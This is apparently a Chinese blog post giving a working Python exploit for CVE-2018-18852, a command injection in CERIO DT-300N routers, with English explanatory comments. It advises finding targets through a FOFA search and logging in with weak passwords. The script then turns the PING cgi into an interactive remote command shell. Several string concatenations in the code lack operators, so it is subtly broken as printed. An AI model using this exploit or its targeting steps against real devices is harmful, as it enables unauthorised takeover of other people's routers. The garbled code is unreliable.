
CVE-2018-18852漏洞利用

CVE-2018-18852 CERIO DT-300N是中国台湾智鼎资讯(CERIO)公司的一款无线路由器。CERIO DT-300N 1.1.6版本至1.1.12版本中存在操作命令注入漏洞。攻击者可利用该漏洞执行ping命令。

查找具备漏洞版本的目标,这里利用FOFA搜索的 title="CERIO" 关键信息,然后找个弱口令登入进去。

漏洞利用代码:

  1. import requests
  2. import json
  3. import base64
  4. class Demo:
     # Probe-and-drive wrapper for the PING cgi of CERIO DT-300N firmware.
     # The injection point is the `ip` field: an interactive command is appended
     # after `127.0.0.1;` and the device presumably hands the value to a shell
     # (the page describes CVE-2018-18852 as an OS command injection; the exact
     # sink is not visible here). Device-side fix: validate `ip` as an IP literal
     # and invoke ping without a shell. Detection: management-interface logs
     # showing `;`, quotes or other shell metacharacters in PING cgi requests.
  5.     def __init__(self,headers,url,payload,url2):
         # headers: HTTP headers, including the Basic Authorization value
         # url: PING cgi path tried first (DT-300N-NGS-M)
         # url2: fallback cgi path tried on 404 (DT-300N)
         # payload: form data posted to the cgi
  6.         self.headers=headers
  7.         self.url=url
  8.         self.payload=payload
  9.         self.url2=url2
  10.     def requet(self):
         # Posts to self.url; on 200 enters an interactive loop on that endpoint,
         # on 404 retries self.url2 and does the same. Both loops run until the
         # process is interrupted. NOTE: `headers` below refers to the module
         # global defined in the __main__ block, not self.headers, so this method
         # only works when the file is run as a script.
  11.         ver = 'DT-300N-NGS-M'
  12.         ver2='DT-300N'
  13.         version=''
  14.         vurl=''
  15.         rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
  16.         nurl=''
  17.         nersion=''
  18.         if rqt.status_code==requests.codes.ok:
  19.             print('[ ] Router version number is {}'.format(ver))
  20.             while True:
  21.                 rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
  22.                 nurl =rqt.url
  23.                 nersion =ver
                     # response body is JSON; its `pid` is echoed back in the next request
  24.                 nary=json.loads(rqt.content)
  25.                 cmd = input('command:')
                     # `[[[` is only an output delimiter so command() can split the response
  26.                 payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': nary['pid'], 'Times': 1}
  27.                 self.command(self.url, headers, payload,nersion)
  28.         elif rqt.status_code==requests.codes.not_found: # check whether the status code is 404
  29.             print('[-] Router version number is not {}'.format(ver))
  30.             rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
  31.             if rqts.status_code==requests.codes.ok:
  32.                 print('[ ] Router version number is {}'.format(ver2))
  33.                 while True:
  34.                     rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
  35.                     version =ver2
  36.                     vurl =rqts.url
  37.                     vary=json.loads(rqts.content)
  38.                     cmd=input('command:')
  39.                     payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': vary, 'Times': 1}
  40.                     self.command(self.url2,headers,payload,version)
  41.             elif rqts.status_code==requests.codes.not_found:
  42.                 print('[-] Router version number is not {}'.format(ver2))
  43.                 exit()
                 # 401 means the Basic credentials were rejected; the cgi is
                 # authenticated, so weak/default passwords are the enabling condition
  44.             elif rqts.status_code==requests.codes.unauthorized:
  45.                 print('[-] Auth is invalid, try other creds')
  46.                 exit()
  47.     def command(self,url,header,data,ver):
         # Posts one crafted payload and prints the part of the response after
         # the delimiter: '/html' for DT-300N, the '[[[' marker otherwise.
         # Raises IndexError if the delimiter is absent from the response.
  48.         rsv=requests.post(url=url,headers=header,data=data)
  49.         if ver=='DT-300N':
  50.             print(rsv.text.split('/html')[1])
  51.         else:
  52.             print(rsv.text.split('[[[')[1])
  53. if __name__ == '__main__':
      # Interactive driver: reads host, port and "user:pass" creds from stdin,
      # builds a Basic Authorization header and tries both cgi paths. Because the
      # cgi is authenticated, exposure depends on credentials and reachability:
      # change default passwords, keep the admin UI off the Internet, and move
      # to firmware outside the affected 1.1.6–1.1.12 range named on this page.
  54.     print('[&]')
  55.     print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
  56.     print('')
  57.     t=''
          # the two candidate cgi endpoints, one per firmware line
  58.     path='/cgi-bin/main.cgi?cgi=PING&mode=9'
  59.     path2='/cgi-bin/Save.cgi?cgi=PING'
  60.     user=input('host:').strip()
  61.     ports=input('port:').strip()
  62.     username=input('creds:').strip()
          # base64("user:pass") for the Basic scheme
  63.     creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
  64.     if ports in '443':
  65.         t ='https://'
  66.     else:
  67.         t ='http://'
  68.     urls=t user ':' ports path
  69.     urls2=t user ':' ports path2
  70.     payload={'cgi':'PING','mode':9}
          # `headers` is also read directly (as a global) inside Demo.requet()
  71.     headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
  72.     obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
  73.     obj.requet()

